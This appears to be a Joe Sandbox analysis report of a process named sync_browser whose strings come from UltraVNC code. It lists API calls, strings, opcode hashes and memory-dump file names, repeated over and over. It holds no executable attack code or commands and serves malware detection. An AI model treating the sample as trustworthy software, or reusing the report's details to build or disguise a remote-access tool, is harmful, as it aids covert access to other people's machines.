                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                    • API String ID: 1063416079-2438250478
                                                    • Opcode ID: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
                                                    • Instruction ID: be4180cfebb41bdb263548e52a7d9379640d4c637f68427d5fbfbd19574b65da
                                                    • Opcode Fuzzy Hash: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
                                                    • Instruction Fuzzy Hash: BDA17D26B04A9186EB50EB66C4542ADA761FB84FACF944332DE2E577E5DF38C446C320
                                                    APIs
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF7D595A5D6
                                                    • i, xrefs: 00007FF7D595A754
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                    • API String ID: 3168844106-2727237473
                                                    • Opcode ID: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
                                                    • Instruction ID: 6accac32b2603e37560c870a288234d6f93c9db9d0e236e060ebdec38b134999
                                                    • Opcode Fuzzy Hash: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
                                                    • Instruction Fuzzy Hash: CA61E022A0C7C29AE724AB2594447BEA7A1FB46B98FC40136DE9D477C1CF3CE495C714
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                    • String ID:
                                                    • API String ID: 3786353176-0
                                                    • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                    • Instruction ID: 6c5220db02c706c80584a9f02b2311ecccec967357d27101b9dde8a5aef2aa57
                                                    • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                    • Instruction Fuzzy Hash: 29415C66A18A4283EB54AB15E49473CBA61FF94F98FD54537CE5D072A1CF3CE400C360
                                                    APIs
                                                    • malloc.LIBCMT ref: 00007FF7D593C5D4
                                                      • Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
                                                      • Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
                                                      • Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$AllocHeap_callnewhmalloc
                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                    • API String ID: 908589684-1814909704
                                                    • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                    • Instruction ID: b68fe90a252d0f8812317a0be27d1d6f918b8557c2c90827309bb1d278aa73e3
                                                    • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                    • Instruction Fuzzy Hash: 37218A32B09B9687E3509B69A84062CBB95EB54B94F891237EFAC47BC5DE39D403C710
                                                    APIs
                                                    • Sleep.KERNEL32 ref: 00007FF7D5947720
                                                      • Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A4B
                                                      • Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A55
                                                      • Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A5F
                                                      • Part of subcall function 00007FF7D5947A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A8B
                                                      • Part of subcall function 00007FF7D5947A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                    • String ID: keyEvent$start_event$stop_event
                                                    • API String ID: 367317321-1979648887
                                                    • Opcode ID: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                    • Instruction ID: 02da7ab382d4995683f07bd3a39af6c14965743d4bdd8ac8c866da024714ceac
                                                    • Opcode Fuzzy Hash: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                    • Instruction Fuzzy Hash: 5A316A65E19A5742FB58BB18A450B7DAB919FC5F48FC4003AED0E0B792DF3CE84583A4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2819658684-0
                                                    • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                    • Instruction ID: 8a9d7f1db181d379fdec0a194345b6815bc86aadc61d4de0b77329a13759c7d3
                                                    • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                    • Instruction Fuzzy Hash: BB215E61A1E68346FB61AB31680127DE295AF45FC8FC45433EE8D87B96EF3CE5408724
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                    • String ID: G
                                                    • API String ID: 2834860089-985283518
                                                    • Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                    • Instruction ID: f7ce2601a126d6baedcc136ce265e61cda1c57de7ffaf4cea005157588114bca
                                                    • Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                    • Instruction Fuzzy Hash: D6317E3251878587E710AF24E4402ACB7A4FF84FA8FC40236EA9907A98CF78D495CB21
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 948891078-0
                                                    • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                    • Instruction ID: 9878c59c439b71ad071fc4005190f70609b22a5f774636bff4509a5ce76bf673
                                                    • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                    • Instruction Fuzzy Hash: CF211D32618B5187E714AB69E44466EB7A0FB88B54FD01132EA9E83BA4DF3DD4448B10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Global$FreeUnlock
                                                    • String ID:
                                                    • API String ID: 1239146723-0
                                                    • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                    • Instruction ID: c2896441f02d98c76fa5aa4583c2c83c24558d91ccc78dafa0a80f4aa8487a60
                                                    • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                    • Instruction Fuzzy Hash: 5A214C31A19A6187EB44AF25F85056CA6A4FFC4F88FC80037ED8E83658CFBCD4518760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Write$ConsoleDebugFileHandleOutputString
                                                    • String ID:
                                                    • API String ID: 1934604790-0
                                                    • Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                    • Instruction ID: c2ee2d5b2b4db487e10f67839ee38c6a3ba53ebdd514d86bd0375de8397ccae3
                                                    • Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                    • Instruction Fuzzy Hash: 2011D065619A9042E740AB39A40476DEB60EB85FF4F984326DFB903BD8CF3DC4458300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _amsg_exit$_getptd_lockfree
                                                    • String ID:
                                                    • API String ID: 2148533958-0
                                                    • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                    • Instruction ID: 0e79f40c1105d8afd15ba2683db7f0a34b6aeae1d4be6417a658d53f77ca767d
                                                    • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                    • Instruction Fuzzy Hash: BE11E722A2964183EA98AB50E4407BDA660FF84F88FC85037EE0D03696DF3CE4558761
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32 ref: 00007FF7D59592F0
                                                      • Part of subcall function 00007FF7D59C7520: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7534
                                                      • Part of subcall function 00007FF7D59C7520: ReleaseSemaphore.KERNEL32 ref: 00007FF7D59C7577
                                                      • Part of subcall function 00007FF7D59C7520: GetLastError.KERNEL32 ref: 00007FF7D59C7581
                                                      • Part of subcall function 00007FF7D59C7520: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C758C
                                                      • Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7427
                                                      • Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7472
                                                      • Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C747B
                                                      • Part of subcall function 00007FF7D59C7400: WaitForSingleObject.KERNEL32 ref: 00007FF7D59C748A
                                                      • Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7495
                                                      • Part of subcall function 00007FF7D59C7400: GetLastError.KERNEL32 ref: 00007FF7D59C74A7
                                                      • Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C74DE
                                                      • Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7500
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                    • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                    • API String ID: 1962697109-2518527632
                                                    • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                    • Instruction ID: eb192f8062193b54965ea4eda9cfa8acf4d12044491bd0cdc93acda1cb15abd7
                                                    • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                    • Instruction Fuzzy Hash: C5114F31A18A8286EB04AF25D4506BDA761FF84FA8FC84236DE5E476E9DF3CD504C760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
